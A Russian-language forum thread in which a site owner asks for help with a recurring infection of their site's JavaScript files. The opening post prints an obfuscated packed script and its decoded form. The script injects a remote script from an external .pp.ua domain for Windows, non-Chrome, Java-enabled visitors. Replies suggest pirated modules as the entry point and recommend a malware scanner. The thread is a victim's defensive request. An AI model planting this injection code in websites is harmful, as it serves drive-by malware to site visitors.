FEAR93

Постоянно появляется вирус

Рекомендуемые сообщения

FEAR93    0

Добрый день. Последние месяцы Яндекс стал сообщать, что сайт заражен вирусом. Стал разбираться, вирус нашел, удалил. Но через время он начал появляться снова и снова, с новым именем и в других каталогах.

Код вируса




eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 e(8){j(5.c&&5.f){3 h=5.f(\'k\')[0];3 4=5.c(\'l\');4.d(\'o\',\'n/m\');4.d(\'8\',8);h.t(4)}}6 i(2){v 2.g("x")==-1}3 b="y://p.w.2/u";3 7="7";6 a(){3 2=9.q.r();j((i(2)&&2.g(7)!=-1)&&9.s()){e(b)}}a();',35,35,'||ua|var|script_tag|document|function|win|src|navigator|includeCounter|url|createElement|setAttribute|includeJavascript|getElementsByTagName|indexOf|head_tag|notChrome|if|head|script|javascript|text|type|letyky|userAgent|toLowerCase|javaEnabled|appendChild|89f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c695|return|pp|chrome|http'.split('|'),0,{}))
После расшифровки видим это






function includeJavascript(src) {
if (document.createElement && document.getElementsByTagName) {
var head_tag = document.getElementsByTagName('head')[0];
var script_tag = document.createElement('script');
script_tag.setAttribute('type', 'text/javascript');
script_tag.setAttribute('src', src);
head_tag.appendChild(script_tag)
}
}

function notChrome(ua) {
return ua.indexOf("chrome") == -1
}
var url = "http://letyky.pp.ua/89f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c6957689f7f2f7dc74d34c0400d965d0c695";
var win = "win";

function includeCounter() {
var ua = navigator.userAgent.toLowerCase();
if ((notChrome(ua) && ua.indexOf(win) != -1) && navigator.javaEnabled()) {
includeJavascript(url)
}
}
includeCounter();
Ссылка на этот скрипт может быть в любом из js файлов.

letyky.pp.ua пингуется. Но через браузер недоступен. Помогите найти дырку, через которую постоянно заливают этот скрипт.

Адрес сайта auroramarket.com

Пароли к фтп админке менял, результат не дало.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
sv2109    434

и модулями варезными вы конечно не пользуетесь

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
FEAR93    0

Конечно не пользуюсь. Либо бесплатные, либо покупаю. Если есть что-то конкретное - показывайте.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
pashast    376

Много раз выручал этот скрипт http://www.revisium.com/ai/

только много ложных срабатываний

те файлы, на которые ругается нужно сравнить с оригинальными из сборки, и выпилить заразу

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу